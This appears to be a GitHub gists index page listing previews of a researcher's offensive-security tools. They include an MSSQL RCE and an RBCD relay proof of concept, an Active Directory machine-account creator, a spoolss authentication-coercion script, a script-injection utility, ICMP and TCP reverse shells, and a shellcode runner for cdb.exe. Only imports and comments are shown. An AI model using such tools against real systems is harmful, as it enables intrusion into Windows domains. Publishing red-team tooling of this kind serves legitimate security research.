Skip to content

Instantly share code, notes, and snippets.

Matt Bush 3xocyte

  • The Missing Link
  • Melbourne, Australia
Block or report user

Report or block 3xocyte

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@3xocyte
3xocyte / adidns_records.py
Last active Nov 12, 2019
get /etc/hosts entries from ADIDNS
View adidns_records.py
#!/usr/bin/env python
import argparse
import sys
import binascii
import socket
import re
from ldap3 import Server, Connection, NTLM, ALL, SUBTREE, ALL_ATTRIBUTES
# get /etc/hosts entries for domain-joined computers from A and AAAA records (via LDAP/ADIDNS) (@3xocyte)
@3xocyte
3xocyte / bad_sequel.py
Last active Oct 11, 2019
PoC MSSQL RCE exploit using Resource-Based Constrained Delegation
View bad_sequel.py
#!/usr/bin/env python
# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
# this is a rough PoC
# requirements for RCE:
# - the attacker needs to either have or create an object with a service principal name
# - the MSSQL server has to be running under the context of System/Network Service/a virtual account
# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts)
# - NTLM has to be in use
@3xocyte
3xocyte / rbcd_relay.py
Last active Nov 1, 2019
poc resource-based constrain delegation relay attack tool
View rbcd_relay.py
#!/usr/bin/env python
# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
# this is a *very* rough PoC
import SimpleHTTPServer
import SocketServer
import base64
import random
import struct
@3xocyte
3xocyte / resolve_domain_computers.py
Last active Oct 15, 2019
get /etc/hosts entries for computers in Active Directory
View resolve_domain_computers.py
#!/usr/bin/env python
# resolve domain computers by @3xocyte
import argparse
import sys
import string
# requires dnspython and ldap3
import dns.resolver
from ldap3 import Server, Connection, NTLM, ALL, SUBTREE
@3xocyte
3xocyte / create_machine_account.py
Last active Nov 22, 2019
simple script for experimenting with machine account creation
View create_machine_account.py
#!/usr/bin/env python
import argparse
import sys
import string
import random
# https://support.microsoft.com/en-au/help/243327/default-limit-to-number-of-workstations-a-user-can-join-to-the-domain
# create machine account utility by @3xocyte
# with thanks to Kevin Robertson for https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1
@3xocyte
3xocyte / dementor.py
Last active Nov 27, 2019
rough PoC to connect to spoolss to elicit machine account authentication
View dementor.py
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser
@3xocyte
3xocyte / scriptinjector.cs
Last active Oct 6, 2018
a small buggy utility inspired by chapter 10 of Black Hat Python by Justin Seitz
View scriptinjector.cs
using System;
using System.IO;
using System.Text;
using System.Linq;
using System.Collections.Generic;
// ephemeral script injector by @3xocyte
// takes a target directory to watch, and an OS command to attempt to inject into any scripts that get modified
namespace FileContentInjector
@3xocyte
3xocyte / icmpshell.cs
Created Aug 13, 2018
ICMP reverse shell (icmpsh compatible)
View icmpshell.cs
using System;
using System.IO;
using System.Text;
using System.Net.NetworkInformation;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Threading;
using System.Collections.ObjectModel;
// .NET ICMP reverse shell client with PowerShell runspace by @3xocyte
@3xocyte
3xocyte / tcpshell.cs
Last active Aug 13, 2018
Reverse TCP shell with PS runspace
View tcpshell.cs
using System;
using System.Text;
using System.Net.Sockets;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Collections.ObjectModel;
using System.Diagnostics;
// reverse TCP shell with powershell runspace
// by @3xocyte
@3xocyte
3xocyte / sc-cdb.py
Last active Sep 3, 2019
shellcode to cbd.exe
View sc-cdb.py
#!/usr/bin/env python
# run: cdb.exe -cf output.wds -o calc.exe
# From: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
src = open('shellcode', 'r')
sc = src.read()
src.close
copy = ";eb @$t0+"
You can’t perform that action at this time.